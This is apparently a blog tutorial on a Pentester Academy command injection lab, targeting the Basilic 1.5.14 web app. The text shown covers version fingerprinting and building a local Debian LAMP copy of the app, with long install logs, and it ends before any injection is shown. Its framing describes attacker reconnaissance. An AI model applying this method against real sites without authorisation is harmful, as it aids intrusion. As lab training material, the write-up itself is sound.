Command Injection in Basilic

Posted on Mon 02 June 2014 in Web Hacking

Here I will kick off my section on hacking web applications. This section will be more like the reverse engineering section, and not like the x86-32 linux or linux kernel hacking sections, in that it will not be laid out in a course format and will instead include single tutorials for certain applications or situations.

This tutorial will be regarding the first challenge in the Pentesting Challenges section of the Pentester Academy website. It is a virtualbox virtual machine labelled Command Injection ISO. This virtual machine has been loaded with a number of web applications that are vulnerable to command injection.

The Vulnerable App

After booting the virtual machine and finding out its IP address, the first thing you do is browse to the IP:

As we can see, there are a number of applications installed here. All of these are potential targets but for this tutorial we'll just concentrate on Basilic. As you can see, it is in /basilic-1.5.14/ so we can assume the target version is 1.5.14.

We can check this by browsing to the basilic-1.5.14 directory and looking at the source of the page (the image below is the source of that page as shown in burpsuite):

Now that we know the application and version number that we want to attack, we now need to set it up on a machine that we control (if this were a real attack, we wouldn't have control of the server which the web application is hosted on so we would download or buy the application and install it locally to pentest it).

Setting Up The App

Browsing to the Basilic website, we can see that 1.5.14 is the latest version:

As my test server, I have installed a default version of Debian 7 (Wheezy), ideally with a real attack we would try to make our development environment as close as possible to the production one, so we would try to figure out what version of Ubuntu, PHP, Apache and MySQL was running (as well as any other software involved) and set it up on those but as the goal is just to find a command injection vulnerability there is no need.

First we need LAMP set up on there:

  1
  2
  3
  4
  5
  6
  7
  8
  9
 10
 11
 12
 13
 14
 15
 16
 17
 18
 19
 20
 21
 22
 23
 24
 25
 26
 27
 28
 29
 30
 31
 32
 33
 34
 35
 36
 37
 38
 39
 40
 41
 42
 43
 44
 45
 46
 47
 48
 49
 50
 51
 52
 53
 54
 55
 56
 57
 58
 59
 60
 61
 62
 63
 64
 65
 66
 67
 68
 69
 70
 71
 72
 73
 74
 75
 76
 77
 78
 79
 80
 81
 82
 83
 84
 85
 86
 87
 88
 89
 90
 91
 92
 93
 94
 95
 96
 97
 98
 99
100
101
102
103
104
105
106
107
108
109
110
111
112
113
114
115
116
117
118
119
120
121
122
123
124
125
126
127
128
129
130
131
132
133
134
135
136
137
138
139
140
141
142
143
144
145
146
147
148
149
150
151
152
153
154
155
156
157
158
159
160
161
162
163
164
165
166
167
168
169
170
171
172
173
174
175
176
177
178
179
180
181
182
183
184
185
186
187
root@dev:~# apt-get install apache2 mysql-server php5 php5-mysql
Reading package lists... Done
Building dependency tree       
Reading state information... Done
The following extra packages will be installed:
  apache2-mpm-prefork apache2-utils apache2.2-bin apache2.2-common libaio1 libapache2-mod-php5 libapr1 libaprutil1
  libaprutil1-dbd-sqlite3 libaprutil1-ldap libdbd-mysql-perl libdbi-perl libhtml-template-perl libnet-daemon-perl libonig2
  libplrpc-perl libqdbm14 mysql-client-5.5 mysql-server-5.5 mysql-server-core-5.5 php5-cli php5-common ssl-cert
Suggested packages:
  apache2-doc apache2-suexec apache2-suexec-custom php-pear libipc-sharedcache-perl libterm-readkey-perl tinyca openssl-blacklist
The following NEW packages will be installed:
  apache2 apache2-mpm-prefork apache2-utils apache2.2-bin apache2.2-common libaio1 libapache2-mod-php5 libapr1 libaprutil1
  libaprutil1-dbd-sqlite3 libaprutil1-ldap libdbd-mysql-perl libdbi-perl libhtml-template-perl libnet-daemon-perl libonig2
  libplrpc-perl libqdbm14 mysql-client-5.5 mysql-server mysql-server-5.5 mysql-server-core-5.5 php5 php5-cli php5-common php5-mysql
  ssl-cert
0 upgraded, 27 newly installed, 0 to remove and 0 not upgraded.
Need to get 16.3 MB of archives.
After this operation, 118 MB of additional disk space will be used.
Do you want to continue [Y/n]? 
Get:1 http://ftp.uk.debian.org/debian/ wheezy/main libaio1 amd64 0.3.109-3 [9,150 B]
Get:2 http://security.debian.org/ wheezy/updates/main mysql-client-5.5 amd64 5.5.37-0+wheezy1 [1,747 kB]
Get:3 http://ftp.uk.debian.org/debian/ wheezy/main libnet-daemon-perl all 0.48-1 [46.2 kB]
Get:4 http://ftp.uk.debian.org/debian/ wheezy/main libplrpc-perl all 0.2020-2 [36.0 kB]
Get:5 http://ftp.uk.debian.org/debian/ wheezy/main libdbi-perl amd64 1.622-1 [898 kB]
Get:6 http://security.debian.org/ wheezy/updates/main mysql-server-core-5.5 amd64 5.5.37-0+wheezy1 [3,387 kB]
Get:7 http://ftp.uk.debian.org/debian/ wheezy/main libdbd-mysql-perl amd64 4.021-1+b1 [126 kB]
Get:8 http://ftp.uk.debian.org/debian/ wheezy/main libonig2 amd64 5.9.1-1 [145 kB]   
Get:9 http://ftp.uk.debian.org/debian/ wheezy/main libqdbm14 amd64 1.8.78-2 [153 kB]
Get:10 http://ftp.uk.debian.org/debian/ wheezy/main libapr1 amd64 1.4.6-3+deb7u1 [106 kB]
Get:11 http://ftp.uk.debian.org/debian/ wheezy/main libaprutil1 amd64 1.4.1-3 [89.8 kB]                                                
Get:12 http://security.debian.org/ wheezy/updates/main mysql-server-5.5 amd64 5.5.37-0+wheezy1 [2,188 kB]                              
Get:13 http://ftp.uk.debian.org/debian/ wheezy/main libaprutil1-dbd-sqlite3 amd64 1.4.1-3 [19.0 kB]                                    
Get:14 http://ftp.uk.debian.org/debian/ wheezy/main libaprutil1-ldap amd64 1.4.1-3 [16.6 kB]                                           
Get:15 http://ftp.uk.debian.org/debian/ wheezy/main apache2.2-bin amd64 2.2.22-13+deb7u1 [779 kB]                                      
Get:16 http://security.debian.org/ wheezy/updates/main php5-common amd64 5.4.4-14+deb7u10 [591 kB]                                     
Get:17 http://security.debian.org/ wheezy/updates/main php5-cli amd64 5.4.4-14+deb7u10 [2,559 kB]                                      
Get:18 http://ftp.uk.debian.org/debian/ wheezy/main apache2-utils amd64 2.2.22-13+deb7u1 [162 kB]                                      
Get:19 http://ftp.uk.debian.org/debian/ wheezy/main apache2.2-common amd64 2.2.22-13+deb7u1 [291 kB]                                   
Get:20 http://security.debian.org/ wheezy/updates/main libapache2-mod-php5 amd64 5.4.4-14+deb7u10 [2,669 kB]                           
Get:21 http://ftp.uk.debian.org/debian/ wheezy/main apache2-mpm-prefork amd64 2.2.22-13+deb7u1 [2,368 B]                               
Get:22 http://ftp.uk.debian.org/debian/ wheezy/main apache2 amd64 2.2.22-13+deb7u1 [1,444 B]                                           
Get:23 http://ftp.uk.debian.org/debian/ wheezy/main libhtml-template-perl all 2.91-1 [72.0 kB]                                         
Get:24 http://ftp.uk.debian.org/debian/ wheezy/main ssl-cert all 1.0.32 [19.5 kB]                                                      
Get:25 http://security.debian.org/ wheezy/updates/main php5-mysql amd64 5.4.4-14+deb7u10 [80.9 kB]                                     
Get:26 http://security.debian.org/ wheezy/updates/main mysql-server all 5.5.37-0+wheezy1 [81.4 kB]                                     
Get:27 http://security.debian.org/ wheezy/updates/main php5 all 5.4.4-14+deb7u10 [1,026 B]                                             
Fetched 16.3 MB in 22s (733 kB/s)                                                                                                      
Preconfiguring packages ...
Selecting previously unselected package libaio1:amd64.
(Reading database ... 27555 files and directories currently installed.)
Unpacking libaio1:amd64 (from .../libaio1_0.3.109-3_amd64.deb) ...
Selecting previously unselected package libnet-daemon-perl.
Unpacking libnet-daemon-perl (from .../libnet-daemon-perl_0.48-1_all.deb) ...
Selecting previously unselected package libplrpc-perl.
Unpacking libplrpc-perl (from .../libplrpc-perl_0.2020-2_all.deb) ...
Selecting previously unselected package libdbi-perl.
Unpacking libdbi-perl (from .../libdbi-perl_1.622-1_amd64.deb) ...
Selecting previously unselected package libdbd-mysql-perl.
Unpacking libdbd-mysql-perl (from .../libdbd-mysql-perl_4.021-1+b1_amd64.deb) ...
Selecting previously unselected package mysql-client-5.5.
Unpacking mysql-client-5.5 (from .../mysql-client-5.5_5.5.37-0+wheezy1_amd64.deb) ...
Selecting previously unselected package mysql-server-core-5.5.
Unpacking mysql-server-core-5.5 (from .../mysql-server-core-5.5_5.5.37-0+wheezy1_amd64.deb) ...
Selecting previously unselected package mysql-server-5.5.
Unpacking mysql-server-5.5 (from .../mysql-server-5.5_5.5.37-0+wheezy1_amd64.deb) ...
Selecting previously unselected package php5-common.
Unpacking php5-common (from .../php5-common_5.4.4-14+deb7u10_amd64.deb) ...
Selecting previously unselected package libonig2.
Unpacking libonig2 (from .../libonig2_5.9.1-1_amd64.deb) ...
Selecting previously unselected package libqdbm14.
Unpacking libqdbm14 (from .../libqdbm14_1.8.78-2_amd64.deb) ...
Selecting previously unselected package php5-cli.
Unpacking php5-cli (from .../php5-cli_5.4.4-14+deb7u10_amd64.deb) ...
Selecting previously unselected package libapr1.
Unpacking libapr1 (from .../libapr1_1.4.6-3+deb7u1_amd64.deb) ...
Selecting previously unselected package libaprutil1.
Unpacking libaprutil1 (from .../libaprutil1_1.4.1-3_amd64.deb) ...
Selecting previously unselected package libaprutil1-dbd-sqlite3.
Unpacking libaprutil1-dbd-sqlite3 (from .../libaprutil1-dbd-sqlite3_1.4.1-3_amd64.deb) ...
Selecting previously unselected package libaprutil1-ldap.
Unpacking libaprutil1-ldap (from .../libaprutil1-ldap_1.4.1-3_amd64.deb) ...
Selecting previously unselected package apache2.2-bin.
Unpacking apache2.2-bin (from .../apache2.2-bin_2.2.22-13+deb7u1_amd64.deb) ...
Selecting previously unselected package apache2-utils.
Unpacking apache2-utils (from .../apache2-utils_2.2.22-13+deb7u1_amd64.deb) ...
Selecting previously unselected package apache2.2-common.
Unpacking apache2.2-common (from .../apache2.2-common_2.2.22-13+deb7u1_amd64.deb) ...
Selecting previously unselected package apache2-mpm-prefork.
Unpacking apache2-mpm-prefork (from .../apache2-mpm-prefork_2.2.22-13+deb7u1_amd64.deb) ...
Selecting previously unselected package libapache2-mod-php5.
Unpacking libapache2-mod-php5 (from .../libapache2-mod-php5_5.4.4-14+deb7u10_amd64.deb) ...
Selecting previously unselected package php5-mysql.
Unpacking php5-mysql (from .../php5-mysql_5.4.4-14+deb7u10_amd64.deb) ...
Selecting previously unselected package apache2.
Unpacking apache2 (from .../apache2_2.2.22-13+deb7u1_amd64.deb) ...
Selecting previously unselected package libhtml-template-perl.
Unpacking libhtml-template-perl (from .../libhtml-template-perl_2.91-1_all.deb) ...
Selecting previously unselected package mysql-server.
Unpacking mysql-server (from .../mysql-server_5.5.37-0+wheezy1_all.deb) ...
Selecting previously unselected package php5.
Unpacking php5 (from .../php5_5.4.4-14+deb7u10_all.deb) ...
Selecting previously unselected package ssl-cert.
Unpacking ssl-cert (from .../ssl-cert_1.0.32_all.deb) ...
Processing triggers for man-db ...
Setting up libaio1:amd64 (0.3.109-3) ...
Setting up libnet-daemon-perl (0.48-1) ...
Setting up libplrpc-perl (0.2020-2) ...
Setting up libdbi-perl (1.622-1) ...
Setting up libdbd-mysql-perl (4.021-1+b1) ...
Setting up mysql-client-5.5 (5.5.37-0+wheezy1) ...
Setting up mysql-server-core-5.5 (5.5.37-0+wheezy1) ...
Setting up mysql-server-5.5 (5.5.37-0+wheezy1) ...
[ ok ] Stopping MySQL database server: mysqld.
140602 16:38:39 [Warning] Using unique option prefix key_buffer instead of key_buffer_size is deprecated and will be removed in a future release. Please use the full name instead.
140602 16:38:39 [Warning] Using unique option prefix myisam-recover instead of myisam-recover-options is deprecated and will be removed in a future release. Please use the full name instead.
140602 16:38:39 [Note] Plugin 'FEDERATED' is disabled.
140602 16:38:39 InnoDB: The InnoDB memory heap is disabled
140602 16:38:39 InnoDB: Mutexes and rw_locks use GCC atomic builtins
140602 16:38:39 InnoDB: Compressed tables use zlib 1.2.7
140602 16:38:39 InnoDB: Using Linux native AIO
140602 16:38:39 InnoDB: Initializing buffer pool, size = 128.0M
140602 16:38:39 InnoDB: Completed initialization of buffer pool
140602 16:38:39 InnoDB: highest supported file format is Barracuda.
140602 16:38:39  InnoDB: Waiting for the background threads to start
140602 16:38:40 InnoDB: 5.5.37 started; log sequence number 1595675
140602 16:38:40  InnoDB: Starting shutdown...
140602 16:38:41  InnoDB: Shutdown completed; log sequence number 1595675
[ ok ] Starting MySQL database server: mysqld ..
[info] Checking for tables which need an upgrade, are corrupt or were 
not closed cleanly..
Setting up php5-common (5.4.4-14+deb7u10) ...

Creating config file /etc/php5/mods-available/pdo.ini with new version
Setting up libonig2 (5.9.1-1) ...
Setting up libqdbm14 (1.8.78-2) ...
Setting up php5-cli (5.4.4-14+deb7u10) ...

Creating config file /etc/php5/cli/php.ini with new version
update-alternatives: using /usr/bin/php5 to provide /usr/bin/php (php) in auto mode
Setting up libapr1 (1.4.6-3+deb7u1) ...
Setting up libaprutil1 (1.4.1-3) ...
Setting up libaprutil1-dbd-sqlite3 (1.4.1-3) ...
Setting up libaprutil1-ldap (1.4.1-3) ...
Setting up apache2.2-bin (2.2.22-13+deb7u1) ...
Setting up apache2-utils (2.2.22-13+deb7u1) ...
Setting up apache2.2-common (2.2.22-13+deb7u1) ...
Enabling site default.
Enabling module alias.
Enabling module autoindex.
Enabling module dir.
Enabling module env.
Enabling module mime.
Enabling module negotiation.
Enabling module setenvif.
Enabling module status.
Enabling module auth_basic.
Enabling module deflate.
Enabling module authz_default.
Enabling module authz_user.
Enabling module authz_groupfile.
Enabling module authn_file.
Enabling module authz_host.
Enabling module reqtimeout.
Setting up apache2-mpm-prefork (2.2.22-13+deb7u1) ...
[....] Starting web server: apache2apache2: Could not reliably determine the server's fully qualified domain name, using 127.0.1.1 for ServerName
. ok 
Setting up libapache2-mod-php5 (5.4.4-14+deb7u10) ...

Creating config file /etc/php5/apache2/php.ini with new version
[....] Restarting web server: apache2apache2: Could not reliably determine the server's fully qualified domain name, using 127.0.1.1 for ServerName
 ... waiting apache2: Could not reliably determine the server's fully qualified domain name, using 127.0.1.1 for ServerName
. ok 
Setting up php5-mysql (5.4.4-14+deb7u10) ...

Creating config file /etc/php5/mods-available/mysql.ini with new version

Creating config file /etc/php5/mods-available/mysqli.ini with new version

Creating config file /etc/php5/mods-available/pdo_mysql.ini with new version
Setting up apache2 (2.2.22-13+deb7u1) ...
Setting up libhtml-template-perl (2.91-1) ...
Setting up mysql-server (5.5.37-0+wheezy1) ...
Setting up php5 (5.4.4-14+deb7u10) ...
Setting up ssl-cert (1.0.32) ...
Processing triggers for libapache2-mod-php5 ...
[....] Reloading web server config: apache2apache2: Could not reliably determine the server's fully qualified domain name, using 127.0.1.1 for ServerName
. ok 

Now that LAMP is installed we can download and install the application, first download the source from the link on their website:

  1
  2
  3
  4
  5
  6
  7
  8
  9
 10
 11
 12
 13
 14
 15
 16
 17
 18
 19
 20
 21
 22
 23
 24
 25
 26
 27
 28
 29
 30
 31
 32
 33
 34
 35
 36
 37
 38
 39
 40
 41
 42
 43
 44
 45
 46
 47
 48
 49
 50
 51
 52
 53
 54
 55
 56
 57
 58
 59
 60
 61
 62
 63
 64
 65
 66
 67
 68
 69
 70
 71
 72
 73
 74
 75
 76
 77
 78
 79
 80
 81
 82
 83
 84
 85
 86
 87
 88
 89
 90
 91
 92
 93
 94
 95
 96
 97
 98
 99
100
101
102
103
104
105
106
107
108
root@dev:~# cd /var/www/
root@dev:/var/www# wget http://artis.imag.fr/Software/Basilic/basilic-1.5.14.tar.gz
--2014-06-02 16:41:18--  http://artis.imag.fr/Software/Basilic/basilic-1.5.14.tar.gz
Resolving artis.imag.fr (artis.imag.fr)... 194.199.18.202
Connecting to artis.imag.fr (artis.imag.fr)|194.199.18.202|:80... connected.
HTTP request sent, awaiting response... 200 OK
Length: 455554 (445K) [application/x-gzip]
Saving to: `basilic-1.5.14.tar.gz'

100%[==============================================================================================>] 455,554     1.13M/s   in 0.4s    

2014-06-02 16:41:18 (1.13 MB/s) - `basilic-1.5.14.tar.gz' saved [455554/455554]

root@dev:/var/www# tar vxzf basilic-1.5.14.tar.gz 
basilic-1.5.14/
basilic-1.5.14/configure
basilic-1.5.14/CSS/
basilic-1.5.14/CSS/basilic.css
basilic-1.5.14/index.html
basilic-1.5.14/Sources/
basilic-1.5.14/Sources/CSS/
basilic-1.5.14/Sources/CSS/publi.css
basilic-1.5.14/Sources/CSS/backoffice.css
basilic-1.5.14/Sources/CSS/listpubli.css
basilic-1.5.14/Sources/CSS/basilic.css
basilic-1.5.14/Sources/CSS/header.css
basilic-1.5.14/Sources/Public/
basilic-1.5.14/Sources/Public/getLanguage.php
basilic-1.5.14/Sources/Public/index.php
basilic-1.5.14/Sources/Public/footer.php
basilic-1.5.14/Sources/Public/publiUtils.php
basilic-1.5.14/Sources/Public/setLanguage.php
basilic-1.5.14/Sources/Public/publi.php
basilic-1.5.14/Sources/Public/updatePubliDocs.php
basilic-1.5.14/Sources/Public/utils.php
basilic-1.5.14/Sources/Public/header.php
basilic-1.5.14/Sources/Public/search.php
basilic-1.5.14/Sources/Intranet/
basilic-1.5.14/Sources/Intranet/index.html
basilic-1.5.14/Sources/Intranet/updatePubliDocs.php
basilic-1.5.14/Sources/Intranet/basilic.html
basilic-1.5.14/Sources/Intranet/utils.php
basilic-1.5.14/Sources/Intranet/Authors/
basilic-1.5.14/Sources/Intranet/Authors/index.html
basilic-1.5.14/Sources/Intranet/Authors/authorAction.php
basilic-1.5.14/Sources/Intranet/Authors/author.php
basilic-1.5.14/Sources/Intranet/Authors/menuAuthor.php
basilic-1.5.14/Sources/Intranet/cnrs.html
basilic-1.5.14/Sources/Intranet/commonMenu.html
basilic-1.5.14/Sources/Intranet/intro.html
basilic-1.5.14/Sources/Intranet/Publications/
basilic-1.5.14/Sources/Intranet/Publications/index.html
basilic-1.5.14/Sources/Intranet/Publications/menuPubli.php
basilic-1.5.14/Sources/Intranet/Publications/updatePublis.php
basilic-1.5.14/Sources/Intranet/Publications/publi.php
basilic-1.5.14/Sources/Intranet/Publications/publiAction.php
basilic-1.5.14/Sources/Intranet/Images/
basilic-1.5.14/Sources/Intranet/Images/import.jpg
basilic-1.5.14/Sources/Intranet/Images/export.jpg
basilic-1.5.14/Sources/Intranet/usersguide.html
basilic-1.5.14/INSTALL
basilic-1.5.14/Public/
basilic-1.5.14/Import/
basilic-1.5.14/Import/_pyxdkbibtex.so
basilic-1.5.14/Import/libxdkbibtex.so.1
basilic-1.5.14/Import/bibtex2table
basilic-1.5.14/Import/pyxdkbibtex.py
basilic-1.5.14/Intranet/
basilic-1.5.14/Intranet/Authors/
basilic-1.5.14/Intranet/Publications/
basilic-1.5.14/Intranet/Images/
basilic-1.5.14/install.html
basilic-1.5.14/Config/
basilic-1.5.14/Config/tables.txt
basilic-1.5.14/Config/include.php
basilic-1.5.14/Config/install.html
basilic-1.5.14/Config/checkConfig.php
basilic-1.5.14/Config/diff.php
basilic-1.5.14/LICENCE
basilic-1.5.14/CHANGELOG
basilic-1.5.14/README
basilic-1.5.14/Images/
basilic-1.5.14/Images/ppt.png
basilic-1.5.14/Images/thumbImgHover.png
basilic-1.5.14/Images/apache.png
basilic-1.5.14/Images/en.png
basilic-1.5.14/Images/thumbMovie.png
basilic-1.5.14/Images/authorUP.png
basilic-1.5.14/Images/thumbMovieHover.png
basilic-1.5.14/Images/defaultThumb.jpg
basilic-1.5.14/Images/empty.png
basilic-1.5.14/Images/required.png
basilic-1.5.14/Images/authorADD.png
basilic-1.5.14/Images/search.png
basilic-1.5.14/Images/php.png
basilic-1.5.14/Images/authorDEL.png
basilic-1.5.14/Images/updatePubli.png
basilic-1.5.14/Images/thumbImg.png
basilic-1.5.14/Images/mySQL.png
basilic-1.5.14/Images/pdf.png
basilic-1.5.14/Images/basilic.jpg
basilic-1.5.14/Images/chercher.png
basilic-1.5.14/Images/fr.png
basilic-1.5.14/Images/basilic.ico
basilic-1.5.14/Images/ps.png
basilic-1.5.14/Images/editPubli.png
basilic-1.5.14/Images/authorDOWN.png
basilic-1.5.14/usersguide.html

Now browsing to the install.html file we get the final installation instructions. It tells us we need to run ./configure in the basilic directory, but before we do this we have to edit the configure script to set the mysql username and password for both intranet and public to basilic, after that we can run it:

1
2
3
4
5
6
7
8
9
root@dev:/var/www# cd basilic-1.5.14/
root@dev:/var/www/basilic-1.5.14# ./configure 
Filtering files...done

Open checkConfig.php in your browser to check your configuration options.

Make sure you access this file through your web server using an URL like
http://your-server/path/to/basilic-1.5.14/checkConfig.php
(and not as a file://...) so that php scripts get interpreted.

Browse to the checkConfig.php script:

Looks good, now for the database:

 1
 2
 3
 4
 5
 6
 7
 8
 9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
root@dev:/var/www/basilic-1.5.14# mysql -uroot -p
Enter password: 
Welcome to the MySQL monitor.  Commands end with ; or \g.
Your MySQL connection id is 43
Server version: 5.5.37-0+wheezy1 (Debian)

Copyright (c) 2000, 2014, Oracle and/or its affiliates. All rights reserved.

Oracle is a registered trademark of Oracle Corporation and/or its
affiliates. Other names may be trademarks of their respective
owners.

Type 'help;' or '\h' for help. Type '\c' to clear the current input statement.

mysql> CREATE DATABASE basilic;
Query OK, 1 row affected (0.01 sec)

mysql> GRANT SELECT,INSERT,UPDATE,DELETE ON basilic.* TO 'basilic'@'localhost' IDENTIFIED BY 'basilic';
Query OK, 0 rows affected (0.00 sec)

mysql> flush privileges;
Query OK, 0 rows affected (0.00 sec)

mysql> quit
Bye
root@dev:/var/www/basilic-1.5.14# mysql -u root -p basilic < Config/tables.txt 
Enter password: 
ERROR 1064 (42000) at line 31: You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near 'TYPE=MyISAM' at line 8

Clearly there is an issue with the tables.txt file, it seems to be putting TYPE=MyISAM as the table type on creation, that can be fixed easy enough as MyISAM is the default table type we can just remove this part from the file:

1
2
3
root@dev:/var/www/basilic-1.5.14# cat Config/tables.txt | sed 's/ TYPE=MyISAM//g' > Config/tables.txt.new
root@dev:/var/www/basilic-1.5.14# mysql -u root -p basilic < Config/tables.txt.new 
Enter password: 

Now the database is set up. we'll have a look at the checkConfig.php script again:

We still need to install imagemagik's convert application and make the web root writable by the web user:

  1
  2
  3
  4
  5
  6
  7
  8
  9
 10
 11
 12
 13
 14
 15
 16
 17
 18
 19
 20
 21
 22
 23
 24
 25
 26
 27
 28
 29
 30
 31
 32
 33
 34
 35
 36
 37
 38
 39
 40
 41
 42
 43
 44
 45
 46
 47
 48
 49
 50
 51
 52
 53
 54
 55
 56
 57
 58
 59
 60
 61
 62
 63
 64
 65
 66
 67
 68
 69
 70
 71
 72
 73
 74
 75
 76
 77
 78
 79
 80
 81
 82
 83
 84
 85
 86
 87
 88
 89
 90
 91
 92
 93
 94
 95
 96
 97
 98
 99
100
101
102
103
104
105
106
107
108
109
110
111
112
113
114
115
116
117
118
119
120
121
122
123
124
125
126
127
128
129
130
131
132
133
134
135
136
137
138
139
140
141
142
143
144
145
146
147
148
149
150
151
152
153
154
155
156
157
158
159
160
161
162
163
164
165
166
167
168
169
170
171
172
173
174
175
176
177
178
179
180
181
182
183
184
185
186
187
188
189
190
191
192
193
194
195
root@dev:/var/www/basilic-1.5.14# apt-get install graphicsmagick-imagemagick-compat
Reading package lists... Done
Building dependency tree       
Reading state information... Done
The following extra packages will be installed:
  fontconfig-config fonts-droid ghostscript graphicsmagick gsfonts libavahi-client3 libavahi-common-data libavahi-common3 libcups2
  libcupsimage2 libffi5 libfontconfig1 libgdk-pixbuf2.0-0 libgdk-pixbuf2.0-common libglib2.0-0 libglib2.0-data libgomp1
  libgraphicsmagick3 libgs9 libgs9-common libice6 libijs-0.35 libjasper1 libjbig0 libjbig2dec0 libjpeg8 liblcms1 liblcms2-2 libltdl7
  libpaper-utils libpaper1 libpng12-0 libsm6 libtiff4 libwmf0.2-7 poppler-data shared-mime-info ttf-dejavu-core x11-common
Suggested packages:
  ghostscript-cups ghostscript-x hpijs graphicsmagick-dbg cups-common libjasper-runtime liblcms-utils liblcms2-utils poppler-utils
  fonts-japanese-mincho fonts-ipafont-mincho fonts-japanese-gothic fonts-ipafont-gothic fonts-arphic-ukai fonts-arphic-uming
  fonts-unfonts-core
The following NEW packages will be installed:
  fontconfig-config fonts-droid ghostscript graphicsmagick graphicsmagick-imagemagick-compat gsfonts libavahi-client3
  libavahi-common-data libavahi-common3 libcups2 libcupsimage2 libffi5 libfontconfig1 libgdk-pixbuf2.0-0 libgdk-pixbuf2.0-common
  libglib2.0-0 libglib2.0-data libgomp1 libgraphicsmagick3 libgs9 libgs9-common libice6 libijs-0.35 libjasper1 libjbig0 libjbig2dec0
  libjpeg8 liblcms1 liblcms2-2 libltdl7 libpaper-utils libpaper1 libpng12-0 libsm6 libtiff4 libwmf0.2-7 poppler-data shared-mime-info
  ttf-dejavu-core x11-common
0 upgraded, 40 newly installed, 0 to remove and 0 not upgraded.
Need to get 24.4 MB of archives.
After this operation, 78.4 MB of additional disk space will be used.
Do you want to continue [Y/n]? 
Get:1 http://ftp.uk.debian.org/debian/ wheezy/main libavahi-common-data amd64 0.6.31-2 [135 kB]
Get:2 http://ftp.uk.debian.org/debian/ wheezy/main libavahi-common3 amd64 0.6.31-2 [54.6 kB]                                           
Get:3 http://ftp.uk.debian.org/debian/ wheezy/main libavahi-client3 amd64 0.6.31-2 [59.5 kB]
Get:4 http://ftp.uk.debian.org/debian/ wheezy/main libcups2 amd64 1.5.3-5+deb7u1 [255 kB]
Get:5 http://ftp.uk.debian.org/debian/ wheezy/main libjpeg8 amd64 8d-1 [134 kB]
Get:6 http://ftp.uk.debian.org/debian/ wheezy/main libpng12-0 amd64 1.2.49-1 [190 kB]
Get:7 http://ftp.uk.debian.org/debian/ wheezy/main libjbig0 amd64 2.0-2+deb7u1 [32.6 kB]
Get:8 http://ftp.uk.debian.org/debian/ wheezy/main libtiff4 amd64 3.9.6-11 [202 kB]
Get:9 http://ftp.uk.debian.org/debian/ wheezy/main libcupsimage2 amd64 1.5.3-5+deb7u1 [138 kB]                                         
Get:10 http://ftp.uk.debian.org/debian/ wheezy/main libffi5 amd64 3.0.10-3 [24.8 kB]                                                   
Get:11 http://ftp.uk.debian.org/debian/ wheezy/main ttf-dejavu-core all 2.33-3 [1,021 kB]                                              
Get:12 http://ftp.uk.debian.org/debian/ wheezy/main fontconfig-config all 2.9.0-7.1 [233 kB]                                           
Get:13 http://ftp.uk.debian.org/debian/ wheezy/main libfontconfig1 amd64 2.9.0-7.1 [300 kB]                                            
Get:14 http://ftp.uk.debian.org/debian/ wheezy/main libglib2.0-0 amd64 2.33.12+really2.32.4-5 [1,838 kB]                               
Get:15 http://ftp.uk.debian.org/debian/ wheezy/main libjasper1 amd64 1.900.1-13 [159 kB]                                               
Get:16 http://ftp.uk.debian.org/debian/ wheezy/main libgdk-pixbuf2.0-common all 2.26.1-1 [497 kB]                                      
Get:17 http://ftp.uk.debian.org/debian/ wheezy/main libgdk-pixbuf2.0-0 amd64 2.26.1-1 [207 kB]                                         
Get:18 http://ftp.uk.debian.org/debian/ wheezy/main libgomp1 amd64 4.7.2-5 [27.5 kB]                                                   
Get:19 http://ftp.uk.debian.org/debian/ wheezy/main x11-common all 1:7.7+3~deb7u1 [284 kB]                                             
Get:20 http://ftp.uk.debian.org/debian/ wheezy/main libice6 amd64 2:1.0.8-2 [63.1 kB]                                                  
Get:21 http://ftp.uk.debian.org/debian/ wheezy/main liblcms1 amd64 1.19.dfsg-1.2 [113 kB]                                              
Get:22 http://ftp.uk.debian.org/debian/ wheezy/main liblcms2-2 amd64 2.2+git20110628-2.2+deb7u1 [144 kB]                               
Get:23 http://ftp.uk.debian.org/debian/ wheezy/main libltdl7 amd64 2.4.2-1.1 [352 kB]                                                  
Get:24 http://ftp.uk.debian.org/debian/ wheezy/main libpaper1 amd64 1.1.24+nmu2 [22.0 kB]                                              
Get:25 http://ftp.uk.debian.org/debian/ wheezy/main libsm6 amd64 2:1.2.1-2 [34.2 kB]                                                   
Get:26 http://ftp.uk.debian.org/debian/ wheezy/main libwmf0.2-7 amd64 0.2.8.4-10.3 [193 kB]                                            
Get:27 http://ftp.uk.debian.org/debian/ wheezy/main poppler-data all 0.4.5-10 [1,479 kB]                                               
Get:28 http://ftp.uk.debian.org/debian/ wheezy/main fonts-droid all 20111207+git-1 [4,312 kB]                                          
Get:29 http://ftp.uk.debian.org/debian/ wheezy/main libijs-0.35 amd64 0.35-8 [20.4 kB]                                                 
Get:30 http://ftp.uk.debian.org/debian/ wheezy/main libjbig2dec0 amd64 0.11+20120125-1 [51.8 kB]                                       
Get:31 http://ftp.uk.debian.org/debian/ wheezy/main libgs9-common all 9.05~dfsg-6.3+deb7u1 [1,980 kB]                                  
Get:32 http://ftp.uk.debian.org/debian/ wheezy/main libgs9 amd64 9.05~dfsg-6.3+deb7u1 [1,844 kB]                                       
Get:33 http://ftp.uk.debian.org/debian/ wheezy/main gsfonts all 1:8.11+urwcyr1.0.7~pre44-4.2 [3,364 kB]                                
Get:34 http://ftp.uk.debian.org/debian/ wheezy/main ghostscript amd64 9.05~dfsg-6.3+deb7u1 [80.0 kB]                                   
Get:35 http://ftp.uk.debian.org/debian/ wheezy/main libgraphicsmagick3 amd64 1.3.16-1.1 [1,320 kB]                                     
Get:36 http://ftp.uk.debian.org/debian/ wheezy/main graphicsmagick amd64 1.3.16-1.1 [1,029 kB]                                         
Get:37 http://ftp.uk.debian.org/debian/ wheezy/main libglib2.0-data all 2.33.12+really2.32.4-5 [1,607 kB]                              
Get:38 http://ftp.uk.debian.org/debian/ wheezy/main libpaper-utils amd64 1.1.24+nmu2 [18.3 kB]                                         
Get:39 http://ftp.uk.debian.org/debian/ wheezy/main shared-mime-info amd64 1.0-1+b1 [595 kB]                                           
Get:40 http://ftp.uk.debian.org/debian/ wheezy/main graphicsmagick-imagemagick-compat all 1.3.16-1.1 [15.9 kB]                         
Fetched 24.4 MB in 1min 43s (236 kB/s)                                                                                                 
Extracting templates from packages: 100%
Preconfiguring packages ...
Selecting previously unselected package libavahi-common-data:amd64.
(Reading database ... 28686 files and directories currently installed.)
Unpacking libavahi-common-data:amd64 (from .../libavahi-common-data_0.6.31-2_amd64.deb) ...
